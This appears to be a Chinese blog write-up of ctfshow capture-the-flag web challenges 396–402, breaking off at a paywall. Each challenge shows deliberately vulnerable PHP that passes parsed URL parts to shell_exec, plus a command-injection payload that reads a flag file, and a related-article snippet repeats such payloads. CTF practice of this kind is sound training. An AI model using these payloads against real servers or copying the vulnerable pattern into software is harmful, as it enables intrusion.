ctfshow其他

最新推荐文章于 2024-05-14 19:15:54 发布
最新推荐文章于 2024-05-14 19:15:54 发布
阅读量571 收藏 1
点赞数
分类专栏: CTF题目 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45655564/article/details/119981043
版权

396

<?php
error_reporting(0);
if(isset($_GET['url'])){
   
    $url = parse_url($_GET['url']);
    shell_exec('echo '.$url['host'].'> '.$url['path']);

}else{
   
    highlight_file(__FILE__);
}

payload

url=http://`tac fl*`/var/www/html/1.txt

397


error_reporting(0);
if(isset($_GET['url'])){
   
    $url = parse_url($_GET['url']);
    shell_exec('echo '.$url['host'].'> /tmp/'.$url['path']);

}else{
   
    highlight_file(__FILE__);
}

url = http://'tac fl*'/../var/www/html/1.txt

398

error_reporting(0);
if(isset($_GET['url'])){
   
    $url = parse_url($_GET['url']);
    if(!preg_match('/;/', $url['host'])){
   
        shell_exec('echo '.$url['host'].'> /tmp/'.$url['path']);
    }

}else{
   
    highlight_file(__FILE__);
}

url=http://1/1;echo `cat fl0g.php`>a.txt

399

error_reporting(0);
if(isset($_GET['url'])){
   
    $url = parse_url($_GET['url']);
    if(!preg_match('/;|>/', $url['host'])){
   
        shell_exec('echo '.$url['host'].'> /tmp/'.$url['path']);
    }

}else{
   
    highlight_file(__FILE__);
}

同上

400

error_reporting(0);
if(isset($_GET['url'])){
   
    $url = parse_url($_GET['url']);
    if(!preg_match('/;|>|http|https/i', $url['host'])){
   
        shell_exec('echo '.$url['host'].'> /tmp/'.$url['path']);
    }

}else{
   
    highlight_file(__FILE__);
}

同上

401

#error_reporting(0);
if(isset($_GET['url'])){
   
    $url = parse_url($_GET['url']);
    var_dump($url);
    if(!preg_match('/;|>|http|https|\|/i', $url['host'])){
   
        shell_exec('echo '.$url['host'].'> /tmp/'.$url['path']);
    }

}else{
   
    highlight_file(__FILE__);
}

同上

402

#error_reporting(0);
if(isset($_GET['url'])){
   
    $url = parse_url($_GET['url']);
    var_dump($url);
    if(preg_match
最低0.47元/天 解锁文章
Anfy1
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
CTFshou wed命令执行29~50
qq_63676207的博客
09-20 1567
ctfshou wed入门
CTF中Web题目的各种基础的思路-----入门篇十分的详细
热门推荐
m0_64815693的博客
09-13 2万+
想学习CTF-web这里给你一个思路,给你一个方向
网络安全最全CTFShow-电子取证篇Writeup_ctfshow 电子取证,2024年最新最新网络安全面试合集
最新发布
2401_84252820的博客
05-14 901
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
ctf刷题 ctfshow【网鼎杯】
weixin_44807430的博客
01-07 2255
纯粹学安全
ctfshow 每周大挑战 极限命令执行
m0_64815693的博客
02-12 3853
ctfshow 每周大挑战 极限命令执行 wp
CTFshow 1-10关
weixin_62369433的博客
11-11 2138
CTFshow 1-10 通关详解
ctfshow web214 时间盲注标准脚本
10-21
ctfshow web214 时间盲注标准脚本
ctfshow web184 正则爆破脚本0x16进制
10-21
ctfshow web184 正则爆破脚本0x16进制
ctfshow web185 正则爆破脚本
10-21
ctfshow web185 正则爆破脚本,以true拼接形成数字,实现ascii代替数字、字母和特殊符号
CTFSHOW其他篇
羽的博客
02-05 2572
web396、397、398、399、400、401 url=http://1/1;echo `ls`>a.txt url=http://1/1;echo `cat fl0g.php`>a.txt web402 payload:url=file://1/1;echo `cat fl0g.php`>a.txt web403 url=http://127.0.0.1/1;echo `cat fl0g.php`>a.txt
CTFShow-WEB入门篇命令执行详细Wp(29-40)
Aluxian_的博客
06-10 2453
【代码】CTFShow-WEB入门篇--命令执行详细Wp。
【CTF练习】Ctfshow入门 爆破(21-24)
Lush_hair_Dl的博客
03-10 1677
爆破题常用的工具就是bp的Intruder模块,将抓到的包发送到Repeater(点击action会有相应选项),用字典爆破:本题是一个登录窗口,首先第一步就是先输入用户名为:admin(一般没有额外提示就这么猜),密码随便输(此处输入111),然后登录。这一过程的目的是为了抓包查看爆破点有的时候抓包会直接看到用户名和密码的位置,这里就不能直接看到,此处将用户名和密码进行base64加密(对于一串字符后有=,基本就要猜测这一串数据是否是base64加密,解密看看是否有什么信息),解密后发现是。
ctfshow 常用姿势
qq_53063436的博客
11-02 889
ctfshow 常用姿态
写入静态文件代码
飞鱼计划
08-19 543
<?php set_time_limit(0); if(isset($_GET['url']) && isset($_GET['filename'])){ if(httpcopy($_GET['url'], $_GET['filename'])){ echo("Done."); }else{ echo("Down Error."); } }els...
CTFshow——文件包含
D.MIND 的博客
02-07 2116
web78 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 这里有个include文件包含。利用Filter机制,构造php://filter/convert.base64-encode/resource=×××的攻击数据读取文件,拿到各种文件的源码 payload: ?file=php://filter/conv
CTF之Bugku 前女友(SKCTF)
weixin_41607190的博客
10-25 304
点进去,代码审计 <?php if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){ $v1 = $_GET['v1']; $v2 = $_GET['v2']; $v3 = $_GET['v3']; if($v1 != $v2 &&...
记录第一次ctf比赛
姜小孩的博客
10-11 1167
第一关是在根据题目提示是在F12里一开始漫无目的的寻找,回头再看看题的时候发现他有提示:看到这都还没找到,有点蠢……然后便往回找,最终找到,第一道题看来是给出的礼物hhhhhhhh 第二关是题目提示是菜刀,但是习惯用蚁剑的我便开始了我的蚁剑之旅,点开环境大大的写着密码是wllm,我非常不好意思的直接连接,找到了flag第二关结束 第三关的题目提示是基操,给我看的蒙蒙的,点开环境仔细读代码原来是让post传id=wllm然后get传json其中json需要用json格式,代码如下: <?php h
ctfshow java
09-06
你对 CTFShow Java 感兴趣吗?我可以为你提供一些信息。CTFShow Java 是一个基于 Java 语言的 CTF(Capture The Flag)竞赛平台,旨在帮助开发人员和安全研究人员提升他们的安全技能和解决问题的能力。该平台提供了一系列的编程和网络安全挑战,涵盖了密码学、逆向工程、漏洞利用等多个领域。如果你想深入了解 CTFShow Java,你可以访问他们的官方网站或者参加他们组织的比赛体验一下。希望这些信息对你有帮助!如果你还有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值